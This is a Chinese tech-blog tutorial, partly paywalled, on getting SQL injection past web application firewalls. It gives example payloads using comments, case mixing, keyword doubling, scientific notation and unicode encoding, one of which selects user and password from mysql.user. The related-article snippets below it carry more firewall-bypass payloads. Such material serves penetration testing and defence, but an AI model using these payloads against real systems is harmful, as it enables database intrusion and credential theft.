绕waf技巧之sql注入

最新推荐文章于 2024-03-15 20:45:27 发布
VIP文章 最新推荐文章于 2024-03-15 20:45:27 发布
阅读量1.5k 收藏 6
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kali3426/article/details/80287108
版权

waf,全名web application firewall,名为web应用防火墙,其实就是市面上的狗、锁、盾、神、宝等等。。可以保护主机、监控流量等。

waf会对sql注入进行过滤,弃置等操作致使sql注入失败,但是也有很多绕过方法

1.使用注释符:

“#”   “--+” “ -- -”   “//“      ”/**/“等等

举例:index.php?id=15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….

2.使用科学记数法:

举例:index.php?id=1e1union select urser,password from mysql.user

3.使用使用大小写:

举例:index.php?id=15 uNIoN sELecT 1,2,3,4….

4.关键字替换:

举例:index.php?id=15 UNIunionON SELselectECT 1,2,3,4….

5.内部注释:

(1)asp+iis环境中,可能会忽略%,而waf不会,所以可尝试以下方法:

        id=1' union se%lect user fr%om username

 (2)iis支持unicode解析,会自动转换unicode编码,但waf不会转换,所以:

id=\u0031\u0020\u0075\u006e\u0069\u006f\u006e\u0020\u0073\u0065\u006c\u0065\u0063\u0074\u0020\u0075\u0073\u0065\u0072

最低0.47元/天 解锁文章
a_16
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入中的WAF过技术
08-19
SQL注入中的WAF过技术,里面的思路很好,可以学习一下
SQL注入WAF
热门推荐
xdjxi的博客
03-14 1万+
SQL注入WAF过的基本方法 WAFWAF(Web Application Firewall)的中文名称叫做“Web应用防火墙”,它依罪女全策略对Web应用程序进行保护。安全策略是WAF的灵魂,所谓的“WAF”就是指通过某种方式无视WAF的安全策略,达到攻击的目的。 方法1:变换大小写 实例:比如WAF拦截了union,那就使用Union、UnloN等方式过。 方法2:编码 实例1:WAF检测敏感字'~,则可以用Ox7e代替,如extractvalue(1 ,concat('~.
SQL注入详解(第五章WAF过)
m0_52051132的博客
09-17 472
【代码】SQL注入详解(第五章WAF过)
【漏洞复现】宝塔WAF-get_site_status-SQL注入漏洞
最新发布
Nday_Seeker
03-15 529
堡塔云 WAF get_site_status 接口 server_name 参数存在 SQL注入漏洞,攻击者可利用此漏洞获取数据库敏感信息。
WAF剖析】——SQL注入之安全狗bypass深度剖析
Demo不是emo的博客
11-23 6726
sql注入不会WAF?关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会吗?看我带你将它拿下
WAF过小技巧
tomyyyyy
09-22 6605
一、WAF过 1、脏数据过 即传入一段长数据使waf失效,从而实现waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。 例如,当发现某网站存在一个反序列化漏洞时,但是无回显,被waf拦截了 利用脏数据插入5000个x字符,可以成功过。 2、高并发过 对请求进行并发,攻击请求会被负载均衡调度到不同节点,导致某些请求过了waf的拦截 3、http参数污染...
WAF机制及过方法总结:注入篇
zhangge3663的博客
05-18 2503
本篇文章主要介绍WAF的一些基本原理,总结常见的SQL注入Bypass WAF技巧WAF是专门为保护基于Web应用程序而设计的,我们研究WAF过的目的一是帮助安服人员了解渗透测试中的测试技巧,而是能够对安全设备厂商提供一些安全建议,及时修复WAF存在的安全问题,以增强WAF的完备性和抗攻击性。三是希望网站开发者明白并不是部署了WAF就可以高枕无忧了,要明白漏洞产生的根本原因,最好能在代码层面上就将其修复。 一、WAF的定义 WAF(Web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略
关于SQL注入过的一些知识点
09-09
网上关于SQL注入技巧有很多,最近正好空下来,想着整理下关于SQL注入过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
渗透测试必备神器SQLMAP的所有waf脚本合集
10-18
这个脚本合集给出了各种数据库对应的waf脚本名称,方便针对各种过滤手段选择对应的脚本 在许多情况下,防火墙只能防御已知的攻击模式和威胁。然而,SQL注入是一种动态的、高度灵活的攻击方式,防火墙很难对其进行...
基于正则类sql注入防御的技巧.pdf
08-07
Range之前发现了xx狗的...分别讲了注释类过和长度类过,另外也说明了各类waf通常对POST注入默认不开启,通过默认配置的遗漏来过注入防御。并展示了拒绝服务漏洞的视频,以及挖掘思路。 简介 注释类 长度类 终极版
Oracle 注入bypass总结(艰难的心路历程)
weixin_42508548的博客
11-24 1631
文前先感谢大家的支持,上篇Oracle数据库注入总结想着后续学习一下如何进行利用,getshell的,奈何技术还太菜了,再加上项目压力大,所以就慢慢搁置了。这里先出一篇bypass的,文中仅针对Oracle数据库,但是bypass手法我认为万变不离其宗,思想上是通用的,希望能够对大家有所帮助。 0x01 环境准备 一、安装Oracle数据库 1、首先下载数据库安装软件 具体可以从参考这里,我是从他的百度云下载的Windows10下安装Oracle 11g_勿忘初心的博客-CSDN博客_win10安装o
WAF攻防之SQL注入
hunanjiushen的博客
12-02 524
对已知的WAF相关过技术,总结如下,网上已有相关技巧的讲解,这里就不一一演示,不明白的可以自己查询相关资料:转存失败重新上传取消在实际攻击场景中,单一的技巧往往无效,需要我们综合利用各种过技术进行组合,结合各自WAF特性不断进行推理,才能真正实现过。从攻击者角度来看,WAF的基本方法其实不多,如何把这些已知方法融合起来,并结合各自WAF本身的防护特性,不断进行推理,成为突破WAF防护的关键。当然,自动化Fuzz才是WAF Bypass新技术产生的正道。
SQL注入的一般方法总结(含WAF过) ctf
NLost
03-20 6587
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器 上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 下面分享几种常见的SQL注入常见过方法:以下以 **index.php?id=1** 为例
第8篇:Oracle注入漏洞waf的新语句
ABC_123的博客
05-02 658
Part1 前言大家好,上期分享了一次MS12-020蓝屏漏洞的巧用。这篇文章源于之前做的一个银行红队项目,遇到到了一个Oracle数据库的SQL注入漏洞,但是网上能搜索到的各种SQL语句都没法出数据,所以客户不认可这个漏洞的危害性,于是就开始了对这个Oracle的SQL注入WAF的探索过程:Part2 研究过程SQL注入判断过程经过对Web应用一系列的手工漏洞.........
常见的WAF过方法
武天旭的博客
02-11 1万+
本篇文章通过网络架构层、HTTP协议层、第三方应用层讲解了WAF的常见方法 一、网络架构层 一般通过域名指向云WAF地址后反向实现代理,找到这些公司的服务器的真实IP即可实现过。 具体方法如下: 1、查找相关的二级域名及同一域名注册者的其他域名解析记录。 2、通过查看邮件MX解析记录来发现真实服务器的IP记录或网段,例如: windows可以执行命令: nslookup -qt=mx baidu.com Linux可以执行如下命令来查看baidu.com域名的MX解析...
sql注入篇--WAF
qq_51003021的博客
08-12 1991
针对WAF
WAF过思路整理(挺全)
weixin_50464560的博客
10-23 7294
转载至:https://harmoc.com/secnote/waf%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF%E6%95%B4%E7%90%86.html WAF过思路整理 <div class="entry-meta"> <ul class="post-meta"> <li><span class="posted-on"><time class="entry-date p
SQL注入WAF
weixin_35753431的博客
02-13 255
SQL注入WAF的方法有很多种,其中一些常见的方法包括: 使用URL编码来隐藏特殊字符,例如将“'”编码为“%27”。 使用多语句查询来WAF,例如将“;”替换为“%3b”。 使用不常见的SQL关键字来WAF,例如使用“version()”代替“@@version”。 使用无用代码来混淆真正的SQL语句,例如在SQL语句中添加多余的空格和注释。 使用已知的WAF技巧WAF,...
sql注入waf
YouthBelief的博客
10-13 2496
sql注入waf 安全狗3.5 1.内联注释+5五位数+%23+%0a 过 ?id=1 union select 1,2,3; 会被拦截 经过测验 union select 函数被拦截 构造 /*!06447%23%0a*/select 即可过 安全狗4.0 ?id=1 union select 1,2,3; 会被拦截 3.5版本过方法 失败 payload union /*!--+/*%0a select /*!1,2,*/3 分析 union /*! --+/*%0a

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值